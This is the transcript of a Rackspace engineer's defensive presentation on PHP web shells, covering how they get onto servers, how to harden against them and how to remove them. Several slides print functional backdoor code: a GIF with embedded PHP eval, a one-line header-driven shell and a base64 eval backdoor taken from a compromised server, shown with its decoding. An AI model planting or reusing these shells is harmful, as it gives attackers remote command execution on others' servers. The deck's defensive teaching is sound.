An introduction to php shells
-
Upload
richiesm -
Category
Presentations & Public Speaking
-
view
1.462 -
download
1
Transcript of An introduction to php shells
An introduction to PHP shells
Richard Mahoney, Developer Support Engineer
Created by: Richard Mahoney
Modified Date:09/05/2013
Classification: Public
RACKSPACE® HOSTING | WWW.RACKSPACE.COM
About Me
•PHP developer before becoming a Linux SysAdmin 6 years ago •Joined Rackspace in 2013•Several years of experience with web app security•Is a Certified Ethical Hacker
2
RACKSPACE® HOSTING | WWW.RACKSPACE.COM
About this presentation
•What PHP shells are and why they exist•Where they come from•How to defend against the threat•Removal•Q & A
3
RACKSPACE® HOSTING | WWW.RACKSPACE.COM 4
So, what is a PHP shell?
RACKSPACE® HOSTING | WWW.RACKSPACE.COM
What is a PHP shell?
•A malicious file containing PHP functions such as eval() and shell_exec() •Accepts input via $_GET, $_POST, HTTP headers and even $_COOKIE•Usually obfuscated: eval(base64_decode('JF9HRVRbY10='));•Used to run arbitrary commands supplied by the attacker•The most common variant is the C99 shell
5
RACKSPACE® HOSTING | WWW.RACKSPACE.COM
How much of a threat?
•Worst case: root compromise via a kernel exploit or simply by looking through files for passwords•But that's not really needed...•As the Apache user it can:•Be used to download, install and execute additional software to join IRC botnets or for Bitcoin mining•Steal data by using MySQL credentials found in PHP files•Host illegal material•Send out huge amounts of spam (very common)•Be used as a proxy for launching attacks on other servers, including those behind the same firewall
6
RACKSPACE® HOSTING | WWW.RACKSPACE.COM
Here’s what one looks like
7
RACKSPACE® HOSTING | WWW.RACKSPACE.COM 8
How did it get onto my server?
RACKSPACE® HOSTING | WWW.RACKSPACE.COM
Where did it come from?
•The vast majority are via vulnerable third-party plugins for Wordpress, Joomla etc•Automated bots scan for the presence of these plugins and notify the attacker•The attacker then uploads the malicious code, typically to an /uploads or /media directory by exploiting the vulnerable website•The attacker visits the malicious shell script via a browser or by using a tool such as cURL•All of these steps could be scripted to continually compromise hosts and build a botnet•But, don't forget (S)FTP or your own code as an attack vector
9
RACKSPACE® HOSTING | WWW.RACKSPACE.COM 10
Defending against the threat
RACKSPACE® HOSTING | WWW.RACKSPACE.COM
The golden rule
•Never trust user input•Validate and sanitise as appropriate•The contents of $_GET, $_POST, $_FILES, $_COOKIE, $_SERVER, $_ENV, and HTTP headers should be considered unsafe•Use PHP functions such as filter_var()•Strip null bytes from filenames by using trim()•Check the contents of any file uploaded to the server. Do not rely on file extensions•Or even the first few bytes of it – malicious code can be embedded inside image files like this GIF:
GIF89a^A???^A??????????????????!??^D^A????????????,????????????^A???^A??????^B^B
D^A???;???
<?php
@error_reporting(0); @set_time_limit(0); $lol = $_GET['lol']; $osc =
$_GET['osc'];
if (isset($lol)) { eval(gzinflate(base64_decode('pZJda8IwFIb ...
11
RACKSPACE® HOSTING | WWW.RACKSPACE.COM
Another example
•Grepping your codebase for strings like 'eval(' will result in a lot of hits in a standard Wordpress install due to it's use in Javascript libraries:
root@www:/var/applications/example.com/public# grep 'eval(' * -R | wc -l
33
•But it's easy for an attacker to evade scans. This is a fully working PHP shell:
<?php $_SERVER['HTTP_A']($_SERVER['HTTP_B']); ?>
Where the HTTP header A is set to the string “eval”, and B can be any PHP function.
12
RACKSPACE® HOSTING | WWW.RACKSPACE.COM
What else can I do?
•Create a .htaccess file in any directories which shouldn't contain PHP code•In the contents:
php_flag engine off
•Ensure SFTP/FTP passwords are strong•Apache log files should be owned by root to prevent LFI (local file inclusion) attacks•Never run Apache as root•Install anti virus software and set it to scan on write
13
RACKSPACE® HOSTING | WWW.RACKSPACE.COM 14
Removal
RACKSPACE® HOSTING | WWW.RACKSPACE.COM
Example of a compromised server
This /images directory contains 3 PHP shells:
[root@web1 images]# ls -l *.php
-rw-r--r-- 1 apache apache 123617 Jun 19 16:09 404.php
-rw-r--r-- 1 apache apache 11684 Jun 19 17:34 mlr2.php
-rw-r--r-- 1 apache apache 24364 Jun 30 17:43 wso.php
The contents:
<?php
eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BP
U1RbJ2UnXSkpO2VjaG8gJzM3MzcyYjM3MzIyZTMyMzMzMDJlMzEzNTM4M2E3Njc4MzI2MzZiNzI2NTNl
NzIzMzY1NjA2MzY4Jzs=')); ?>
15
RACKSPACE® HOSTING | WWW.RACKSPACE.COM
Example of a compromised server
Which evaluates to:
if(isset($_POST['e']))eval(base64_decode($_POST['e']));echo
'37372b37322e3233302e3135383a767832636b72653e723365606368';
To make these safe, move them to somewhere like “/root/compromised_files” if you want to investigate further, or just delete them.If you can't/don't want to move the files, chmod to 000 and set the owner to root to disable access:
[root@web1 images]# ls -l *.php
---------- 1 root root 123617 Jun 19 16:09 404.php
---------- 1 root root 11684 Jun 19 17:34 mlr2.php
---------- 1 root root 24364 Jun 30 17:43 wso.php
16
RACKSPACE® HOSTING | WWW.RACKSPACE.COM
Next steps
•Check for unusual files in places such as /tmp and /var/cache•Use “ls -la” to show hidden directories•Study the output of “lsof”•If malicious files owned by root are found, wipe the server and reinstall•Update all software on the server, including any CMS addons/plugins•Perform a virus scan
17
RACKSPACE® HOSTING | WWW.RACKSPACE.COM 18
Any Questions?
RACKSPACE® HOSTING | WWW.RACKSPACE.COM
Further reading
The Open Web Application Security Project – (OWASP) Top 10: owasp.org
The PHP Security Guide: phpsec.org
/r/Netsec: reddit.com/r/netsec
19
RACKSPACE® HOSTING | 5000 WALZEM ROAD | SAN ANTONIO, TX 78218
US SALES: 1-800-961-2888 | US SUPPORT: 1-800-961-4454 | WWW.RACKSPACE.COM
RACKSPACE® HOSTING | © RACKSPACE US, INC. | RACKSPACE® AND FANATICAL SUPPORT® ARE SERVICE MARKS OF RACKSPACE US, INC. REGISTERED IN THE UNITED STATES AND OTHER COUNTRIES. | WWW.RACKSPACE.COMRACKSPACE® HOSTING | © RACKSPACE US, INC. | RACKSPACE® AND FANATICAL SUPPORT® ARE SERVICE MARKS OF RACKSPACE US, INC. REGISTERED IN THE UNITED STATES AND OTHER COUNTRIES. | WWW.RACKSPACE.COM
RACKSPACE® HOSTING | 5 MILLINGTON ROAD | HAYES, UNITED KINGDOM UB3 4AZ
UK SALES: +44 (0)20 8712 6507 | UK SUPPORT: 0800 988 0300 | WWW.RACKSPACE.CO.UK